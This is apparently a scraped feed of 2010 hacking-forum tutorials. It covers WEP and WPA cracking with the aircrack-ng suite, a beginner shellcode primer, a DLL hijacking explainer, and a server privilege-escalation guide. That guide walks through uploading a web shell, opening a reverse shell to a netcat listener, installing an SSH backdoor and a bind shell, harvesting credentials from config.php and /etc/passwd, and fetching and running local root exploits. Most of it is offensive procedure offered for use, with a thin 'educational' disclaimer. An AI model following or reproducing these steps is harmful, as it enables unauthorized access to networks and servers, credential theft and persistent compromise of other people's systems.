Offset 59 (23% done) | xor = E0 | pt = FF | 14 frames written in 230ms
Offset 58 (26% done) | xor = CD | pt = FF | 753 frames written in 12813ms
Offset 57 (29% done) | xor = 3A | pt = FF | 669 frames written in 11369ms
Offset 56 (32% done) | xor = 3E | pt = FF | 19 frames written in 320ms
Offset 55 (35% done) | xor = 61 | pt = FF | 276 frames written in 4701ms
Offset 54 (38% done) | xor = AC | pt = FF | 1960 frames written in 33312ms
Offset 53 (41% done) | xor = 36 | pt = FE | 1100 frames written in 18705ms
Offset 52 (44% done) | xor = ED | pt = 01 | 91 frames written in 1546ms
Offset 51 (47% done) | xor = 8D | pt = A8 | 144 frames written in 2443ms
Offset 50 (50% done) | xor = C8 | pt = C0 | 42 frames written in 714ms
Offset 49 (52% done) | xor = 4B | pt = A9 | 173 frames written in 2941ms
Offset 48 (55% done) | xor = 46 | pt = 97 | 2360 frames written in 40130ms
Offset 47 (58% done) | xor = 27 | pt = 48 | 320 frames written in 5435ms
Offset 46 (61% done) | xor = 44 | pt = E4 | 1281 frames written in 21766ms
Offset 45 (64% done) | xor = 84 | pt = 19 | 1650 frames written in 28064ms
Offset 44 (67% done) | xor = 33 | pt = 00 | 241 frames written in 4091ms
Offset 43 (70% done) | xor = A2 | pt = 01 | 193 frames written in 3289ms
Offset 42 (73% done) | xor = AD | pt = 00 | 613 frames written in 10407ms
Offset 41 (76% done) | xor = 17 | pt = 04 | 163 frames written in 2776ms
Offset 40 (79% done) | xor = FA | pt = 06 | 1353 frames written in 23009ms
Offset 39 (82% done) | xor = C5 | pt = 00 | 136 frames written in 2305ms
Offset 38 (85% done) | xor = B5 | pt = 08 | 2027 frames written in 34467ms
Offset 37 (88% done) | xor = 05 | pt = 01 | 488 frames written in 8295ms
Offset 36 (91% done) | xor = 7B | pt = 00 | 18 frames written in 303ms
Offset 35 (94% done) | xor = DB | pt = 06 | 229 frames written in 3890ms
Offset 34 (97% done) | xor = 2C | pt = 08 | 404 frames written in 6871ms


Saving plaintext in replay_dec-0901-015714.cap
Saving keystream in replay_dec-0901-015714.xor


Completed in 152s (0.20 bytes/s)


Success ^ :)
Step 6. Use packetforge-ng to create a ARP packet



packetforge-ng -0 -a 00:19:E4:48:97:A9 -h 36:b1:e6:05:32:da -k 255.255.255.255 -l 255.255.255.255 -y fragment-0901-005142.xor -w wepcrack


-0 means create a ARP packet
-a is the WAP MAC in this case 00:19:E4:48:97:A9
-h is your MAC address in this case 36:b1:e6:05:32:da
-k is the destination IP (most AP's will work find with this setting)
-l is the source ip (again most AP's will respond fine with this)
-y fragment-0901-006142.xor is the file you get your PRGA from
-w is the name of the file you wish to call it in this case wepcrack


Success will look like this


Wrote packet to: wepcrack


Step 7. Inject the ARP packet



aireplay-ng -2 -r wepcrack mon0


-2 means interative mode
-r is the file of which to read the arp packet in this case wepcrack


you should see something similar


No source MAC (-h) specified. Using the device MAC (00:C0:CA:33:7F:72)




Size: 68, FromDS: 0, ToDS: 1 (WEP)


BSSID = 00:19:E4:48:97:A9
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:C0:CA:33:7F:72


0x0000: 0841 0201 0019 e448 97a9 00c0 ca33 7f72 .A.....H.....3r
0x0010: ffff ffff ffff 8001 df6e f700 79d3 cc92 .........n..y...
0x0020: f911 0d44 a461 c287 e878 caf7 61ea edbc ...D.a...x..a...
0x0030: a2cc 2b96 c8fa 1097 cb73 75ac cfd6 f8c6 ..+......su.....
0x0040: eea8 f908 ....


Use this packet ? y


Now we wait for about 40,000 IV's. If you take a look at your airodump window you will see the data start to sky rocket. When this reaches 40,000 hit ctrl+C to kill the process.


Succes :)


CH 1 ][ Elapsed: 27 mins ][ 2010-09-01 01:19


BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID


00:19:E4:48:97:A9 -67 33 8396 43869 41 1 54 . WEP WEP 2WIRE040


Final Step: Crack the WEP key



aircrack-ng -b 00:19:E4:48:97:A9 crackwep*.cap


-b is the WAP MAC address in this case 00:19:E4:48:97:A9


After a few seconds you will get the key


Aircrack-ng 1.0 r1645




[00:00:00] Tested 74 keys (got 43384 IVs)


KB depth byte(vote)
0 0/ 2 82(57088) CE(52224) 09(51968) F1(51712) 8A(51200) 3E(50944) 52(50432) 4E(50176) 4F(50176) 93(50176) 35(49920) EE(49920) 13(48896) 14(48896)
1 1/ 3 90(52736) F9(52224) 2E(51200) D5(50944) BA(50688) B9(50432) 51(49920) C1(49920) 48(49664) 35(49408) 12(49152) 9B(49152) F4(48896) 9D(48640)
2 0/ 1 73(60416) 49(54016) 79(52480) 11(52224) 22(52224) 7B(51712) EF(50944) 16(50432) 58(50432) 82(50432) D4(50432) 72(49664) 3A(49408) BA(49152)
3 0/ 6 08(56320) A8(54784) 1C(52992) B3(52736) 10(52224) 8D(51968) D8(50944) 82(50688) 10(50176) 0E(49920) CB(49920) F7(49408) 5F(49152) DA(49152)
4 0/ 3 80(55808) 00(52480) 0B(51456) FC(50944) 95(50432) B7(50432) AE(49920) C0(49408) E4(49152) 24(48896) 6D(48896) 82(48896) 7F(48640) D4(48640)


KEY FOUND! [ 82:77:73:08:80 ]
Decrypted correctly: 100%


I hope you enjoyed my tutorial.


Securityxxxpert


Note I will be making a video as well to attach with when time permits.


For those that want a nice pdf of the same thing I uploaded it here


http://rapidshare.com/files/41639145...ients.pdf.html ]]> securityxxxpert http://forum.intern0t.net/offensive-guides-information/3019-cracking-wep-without-clients-connected-wap.html My First Shellcode - Part 1 http://forum.intern0t.net/offensive-guides-information/3013-my-first-shellcode-part-1-a.html Tue, 31 Aug 2010 11:41:07 GMT Since I'm doing the CTP course by Offensive Security and need to be capable
of writing my own shellcode by hand, I decided to study this topic in depth which
has given me a lot more knowledge though I need to become even better, be-
cause I'm still only a beginner.

This guide is intended for Windows Operating Systems running Windows XP with-
out ASLR enabled since hardcoded memory addresses for API calls will be used.


Introduction
Assembly which is the language that I'll be using throughout this tutorial is
actually CPU instructions aka opcodes. Occasionally I refer to this as machine
code, binary code and shellcode since they're essentially the same.

Shellcode however, should result in code execution such as a shell.

Whenever you're writing assembly, you should know about how the registers
function how the memory is handled on the Intel Architecture systems (IA-32).

In this case we're using IA-32 (Intel Architecture, 32-bit) aka the x86
architecture which consists of a "couple" of registers able to contain,
yes 32 bits each. 64-bit processors are able to contain 64 bits.

A register you can use is e.g. EDI, and if all the bits are used it looks like this:
11111111 11111111 11111111 11111111

Whenever we're in a debugger, we would see this: FFFF FFFF

If we add 1 to this value, the register becomes 0 because it "Wraps Around" at the highest value.

Now I won't be going to explain why the value FFFF FFFF is equal to -1 since
that still confuses me a little even though I may cover this topic later.

For now it's not that important since we'll use our debugger to calculate for us in case we need it.

Now, lets get back the registers.

Here is a list of all the registers:
* AX/EAX: accumulator
* BX/EBX: base index (ex: arrays)
* CX/ECX: counter
* DX/EDX: data/general
* SI/ESI: "source index" for string operations.
* DI/EDI: "destination index" for string operations.
* SP/ESP: stack pointer for top address of the stack.
* BP/EBP: stack base pointer for holding the address of the current stack frame.
* IP/EIP: instruction pointer. Holds the program counter, the current instruction address.

In essence, we can use most of these registers as we like. There's no such
thing as we have to use ESI for one thing, and EDI for another in case we
need to use a registers for a calculation or store a temporary value.

However when we're dealing with API's, the EAX register is usually used to
call into the specific API functions, such as in this case: MessageBoxA.

While other registers has other purposes too of course.


A bit more about registers and IA-32
I should note that EIP is the "Current Instruction Pointer", which we cannot
alter directly as it points to the next instruction which is going to be executed.

However if we perform a jump (to somewhere else in memory) or "call" a function,
then EIP will change to whatever value we desire however if the value does not point
to an opcode which can be executed, then we may receive an error. (Access Violation,
or perhaps another depending on what happened.)

Whenever a buffer overflow happens, control over the EIP (usually) means we can play.

Now, ESP is also quite important. This points to our stack, where values and
more are stored, usually as arguments aka variables for API calls! :wink:

EBP is the base pointer, which can be manipulated and contain erroneous
values but in case we're using API functions, this should point to a valid
position on the stack. (Point to valid memory stack space.)

Enough about registers, about IA-32:
Q: When you're writing an opcode in OllyDbg you may notice that the code
is somewhat reversed, why is that?
A: In short it's because of "Little Endian" (a guy from outer space) which
needs the data to be in an order which is "kinda" reversed. Here's an example.

We're going to send DEADBEEF (this hexadecimal value is valid for test purposes),
into a register via perhaps a buffer overflow or by executing a file which contains
this instruction. (Lets just say the instruction is MOV EAX, 0xDEADBEEF)

Without the instruction, which simple takes a value and puts it into EAX,
we note that DEADBEEF without our debugger doing the job for us, needs
to be in Little Endian byte order.

1 byte consists of 8 bits.

8 bits looks like: 1111 1111

What does 1 byte look like? FF is equal to 1111 1111 (binary) which is 1 byte.

So DEADBEEF, equals 4 bytes! (DE AD BE EF == 4 bytes == 32 bits)

Now, in Little Endian byte order..

The actual bytes are not reversed, but the structure is! So DEADBEEF, is
split up into DE AD BE EF, which is reversed to: EF BE AD DE.

Simply, the last value is read first! (Thumb rule!)


This is good to know, especially when we push data onto the stack and
when we're sending "return addresses" in buffer overflows where this ad-
dress needs to be in Little Endian order, because otherwise perhaps EIP
will look, reversed to us which isn't what we want to do :wink:


By knowing all of this, we're ready to continue onto the next part.
Link: http://forum.intern0t.net/offensive-...de-part-2.html

(The next part will contain actual assembly code, this part was made in
order to make sure the reader would understand the basic concepts of
Assembly code and how memory is handled, in short.)


References:
http://en.wikipedia.org/wiki/X86
http://en.wikipedia.org/wiki/IA-32 ]]> MaXe http://forum.intern0t.net/offensive-guides-information/3013-my-first-shellcode-part-1-a.html Cracking WPA and WPA2 http://forum.intern0t.net/offensive-guides-information/3006-cracking-wpa-wpa2.html Sun, 29 Aug 2010 11:52:26 GMT Hi I said I was going to make a video on this, and I have done just that The technique for cracking WPA and WPA2 keys is exactly the same so... Hi

I said I was going to make a video on this, and I have done just that

The technique for cracking WPA and WPA2 keys is exactly the same so this video can be used with WPA and WPA2 networks using PSK

This is only for informative and educational purposes only and should not be used anywhere else


Password: Intern0t

http://rapidshare.com/files/415851179/Crack_WPA.zip

Or watch it online here


In this video, the target network is called 'Network'
The attack consisted of a de-authentication for a connected client, forcing it to
re-authenticate, which means they will have to go through the Pre Shared Key, which
we will capture
I then ran a dictionary bruteforce attack on this PSK in order to get the password
for the network

This is the first of hopefully many WiFi videos to be uploaded throughout the next few weeks

Next week I will be covering clientless WEP cracking using the Aircrack-ng suite of tools

Take care :D

:: EDIT ::

Episode 2 here ]]> TheXero http://forum.intern0t.net/offensive-guides-information/3006-cracking-wpa-wpa2.html DLL Hijacking http://forum.intern0t.net/offensive-guides-information/2986-dll-hijacking.html Wed, 25 Aug 2010 11:04:22 GMT This thread is a mix of difference resources. I have not tested this myself though I look very much forward to do so because it sounds easy yet... This thread is a mix of difference resources. I have not tested this myself though I
look very much forward to do so because it sounds easy yet interesting, so give it a try :wink:

First some generic information about the vulnerability which you can read more
about in the references in the bottom of this thread, in case you want to know more.

SANS Quote
Quote:
For the last couple of days there have been a lot of discussions about a vulnerability published by a Slovenian security company ACROS. HD Moore (of Metasploit fame) also independently found hundreds of vulnerable applications and, as he said, the cat is now really out of the bag.

In order to see what is going here we first have to understand how modern applications are built. Modern applications come modularized with multiple DLLs (Dynamic Link Libraries). This allows the programmer to use functions available in other DLLs on the system – Windows has hundreds of them.

Now, if a DLL is not available on the system, the developer can decide to pack it with the main application’s executable and store it, for example, in the applications directory.

The most important DLLs are specified in the KnownDLLs registry key (HKLM/System/CurrentControlSet/Control/Session Manager/KnownDLLs). These are easy – if an application needs to load it, the system knows that they have to be in the directory specified by the DllDirectory registry key, which is usually %SystemRoot%/system32.

However, when another DLL is being loaded, the system dynamically tries to find the DLL. Historically, Microsoft made a mistake by putting the current directory in the first place (some of you Unix oldies might remember when “.” was at the first place in the PATH variable). This has been fixed by Microsoft by introducing the SafeDllSearchMode setting (registry value). This setting specifies the order in which a DLL will be searched for. For example, as specified in http://msdn.microsoft.com/en-us/libr...=VS.85%29.aspx this is the search order with the SafeDllSearchMode setting enabled:

1. The directory from which the application loaded.
2. The system directory. Use the GetSystemDirectory function to get the path of this directory.
3. The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched.
4. The Windows directory. Use the GetWindowsDirectory function to get the path of this directory.
5. The current directory.
6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the App Paths registry key. The App Paths key is not used when computing the DLL search path.
After reading this a bit more information about the vulnerability should be read.


Metasploit Quote #1
Quote:
This vulnerability is triggered when a vulnerable file type is opened from within a directory controlled by the attacker. This directory can be a USB drive, an extracted archive, or a remote network share. In most cases, the user will have to browse to the directory and then open the target file type for this exploit to work. The file opened by the user can be completely harmless, the flaw is that the application launched to handle the file type will inadvertently load a DLL from the working directory.

In practice, this flaw can be exploited by sending the target user a link to a network share containing a file they perceive as safe. iTunes, which was affected by this flaw until last week, is associated with a number of media file types, and each of these would result in a specific DLL being loaded from the same directory as the opened file. The user would be presented with a link in the form of \\server\movies\ and a number of media files would be present in this directory. If the user tries to open any of these files, iTunes would search the remote directory for one or more DLLs and then load these DLLs into the process. If the attacker supplied a malicious DLL containing malware or shellcode, its game over for the user.
And after you have read this, or even more you should read how to do this yourself!


Metasploit Quote #2
Quote:
Due to an overwhelming amount of interest in the initial DLLHijackAuditKit released on Monday, I rewrote the tool to use native JScript, automatically kill spawned processes, reduce the memory usage by ProcMon, and automatically validate every result from the CSV log. The result is DLLHijackAuditKit v2. This kit greatly speeds up the identification process for vulnerable applications. An extremely simple HOWTO:

1. Download the DLLHijackAuditKit v2 and extract it into a local directory on the system you would like to test.

2. Browse to this directory and launch 01_StartAudit.bat as an Administrator. The Administrator bit is important, as it will allow the script to kill background services that are spawned by the handlers and prevent UAC popups.

3. After the audit script completes (15-30 minutes), switch to the Process Monitor window, and access File->Save from the menu. Save the resulting log in CSV format to the local directory with the name "Logfile.CSV".

4. Launch 02_Analyze.bat as an Administrator. This will scan through the CSV log, build test cases for each potential vulnerability, try them, and automatically create a proof-of-concept within the Exploits directory should they succeed.

5. Identify the affected vendor for each generated proof-of-concept and ask them nicely to fix their application. Send them the calc.exe-launching PoC if necessary.

Thanks again to everyone who provided feedback (positive or negative) on the original tool, especially Rob Fuller, who let me forkbomb his system in the process of testing the new kit.
You can get the DLL Hijack Audit Kit here: https://www.metasploit.com/redmine/p...ckAuditKit.zip

And you can watch a presentation of how it works here: http://www.offensive-security.com/ohnoz.mp4


Thanks a lot to all the parties involved!


In case you want to see typical PoC's, check Exploit-DB out! ( http://www.exploit-db.com/local/ )

I will definitely play with this, perhaps today and try to create some PoC's too! :wink:



Best regards,
MaXe


References:
http://www.microsoft.com/technet/sec...y/2269637.mspx
http://isc.sans.edu/diary.html?storyid=9445
http://blog.metasploit.com/2010/08/e...ing-flaws.html
http://blog.metasploit.com/2010/08/b...-stronger.html
http://www.offensive-security.com/of...oit-in-action/ ]]> MaXe http://forum.intern0t.net/offensive-guides-information/2986-dll-hijacking.html Guide Escalating Privileges in a Shell http://forum.intern0t.net/offensive-guides-information/2943-escalating-privileges-shell.html Thu, 12 Aug 2010 18:35:45 GMT I used a few different tutorials I had on my hard drive as references, and for the files. FILES: Multiupload.com - upload your files to multiple... I used a few different tutorials I had on my hard drive as references, and for the files.

FILES:
Multiupload.com - upload your files to multiple file hosting sites!

So, there are a few different ways that we can root a server.
1. Check config.php for login credentials and try them on SSH.
2. Check /etc/passwd for login credentials, then use them on SSH
3. Poorly configured FTP for login credentials
4. Back connect


1.
We're going to assume you have a shell up.. So, first thing we do here, is go check in the config.php file for mysql login details.
Once we get them, we can try using the credentials pretty much any way that we can connect.
Such as SSH... If it works, easy way to get root :P

2.
We're going to assume you have a shell up.. Navigate to /etc/passwd, and save the passwords to your harddrive somewhere.. Most of the time they will be encrypted, but you can brute force it.. Once you get the password, try just using that info as SSH info, and if it works. Then you have root lol.

3.
For this one, you don't actually need a shell up.
Pretty much I only know how to do this VIA command prompt/shell... Don't know if it can be done via an FTP client.
FTP is used to upload multiple files to a server. There is a root account that has permission to do anything... We don't have access to it, and it would take a long time for anyone to bruteforce it.. Well, assuming the host isn't retarded.

First, you open cmd/prompt.
Type in:
Code:
ftp http://www.example.com
Make sure that you type in the wrong credentials... If you guess right off the beginning, congrats.
Then, after that, type in:
Code:
quote user ftp
Then:
Code:
quote cwd ~root
and finally
Code:
quote pass ftp
That will just tell you the User account, and password info.

Simple enough. Keep in mind, it doesn't always work.


4.
First off, we're going to assume that you have your shell uploaded. I recommend mshell. We will also assume it's uploaded at:
Code:
http://www.example.com/shell.php
(Not like it really matters)
So, first thing we're going to want to do, is upload our back connect script. I've uploaded all the tools we're going to, the download link is at the top of the guide.

So, we upload back.pl using the upload feature of the shell we have. The back connect will send a connection to our computer from the server..
For this, we're going to need to download and install netcat.. If you're on windows, go to:
Code:
http://joncraton.org/files/nc111nt.zip
If you're on linux, open your terminal, and type:
Code:
sudo apt-get install netcat
Now that we've uploaded it, we have to port forward port 6669 on our router... After that, load up the terminal/cmd. If you're on windows navigate to the netcat directory, and type:
If on windows:
Code:
nc.exe -vv -l -p 6669
If on linux
Code:
sudo nc -vv -l -p 6669
That will open up a connection to listen to on port 6669. After that, we have to go back to the server, and use the command function:
Code:
perl back.pl YourIP 6669
That there, makes the server send a connection to your IP via port 6669, which netcat will pickup, and let us run commands via the command line. Okay, so after that, check netcat, and you should have a connection. If not, I'm pretty sure you did something wrong lol.

Well, then you want to upload the local.pl file I've included. Then, switch over to netcat, and type in
Code:
perl local.pl
Now, we have a backdoor up. So, now we upload the sshdoor.tgz also.. Go back to netcat, and run the following commands:
Code:
tar -zxvf sshdoor.tgz
De-compresses the sshdoor.tgz.
Then
Code:
cs sshdoor
Moves the command line into the sshdoor folder, so we can execute files within it.
Then
Code:
.install somepassword 6669
Installs sshdoor with the password "somepassword' which you can change to whatever you want. After that, we run can run putty and connect to the server.

So, now that we've gotten this far, we upload xbind.c, and compile it using the gcc compiler..

Code:

gcc -o xbind xbind.c
Compile it, run it, and connect. Then run:

Code:
./xind 1985
Now, run netcat again, type in the password you created, and run the following command:

Code:
whoami
If that comes up as root, or uid=0 or something like that, you've got root.
Okay, so if the local root shell didn't work.. No worries. If you got the back connection up, you can run
Code:
uname -a
To figure out the linux version, smtp version, and php version. Then, you search for exploits for those on google, Injector, Security focus, etc. Once you find one of those, you can either upload it, or wget it:
Code:
wget http://www.website.com/exploit/38932
You're going to have to compile it after this:
Code:
gcc localroot -o 38932
GCC is a command used in SSH which compiles a directory. Our example above tells the GCC to compile 38932 as localroot. Then, you're going to have to run the exploit, and hope that one works.. (Which it should),
Code:
./localroot
Then, you should be good. But just to make sure you are... Type the command:
Code:
whoami
Then, it should come up as root/uid=0 or something similar.. Congrats, and have run with root. ]]> Starwiz http://forum.intern0t.net/offensive-guides-information/2943-escalating-privileges-shell.html Guide FTP - Root Account Disclosure http://forum.intern0t.net/offensive-guides-information/2934-ftp-root-account-disclosure.html Thu, 12 Aug 2010 18:28:19 GMT This is my tutorial on FTP hacking. I've seen this around on the internet, and it doesn't work for every website.

Pretty much I only know how to do this VIA command prompt/shell... Don't know if it can be done via an FTP client.
FTP is used to upload multiple files to a server. There is a root account that has permission to do anything... We don't have access to it, and it would take a long time for anyone to bruteforce it.. Well, assuming the host isn't retarded.

First, you open cmd/prompt.
Type in:
Code:

ftp http://www.example.com
Make sure that you type in the wrong credentials... If you guess right off the beginning, congrats.
Then, after that, type in:
Code:

quote user ftp
Then:
Code:

quote cwd ~root
and finally
Code:

quote pass ftp
That will just tell you the User account, and password info.

Simple enough. Keep in mind, it doesn't always work. ]]> Starwiz http://forum.intern0t.net/offensive-guides-information/2934-ftp-root-account-disclosure.html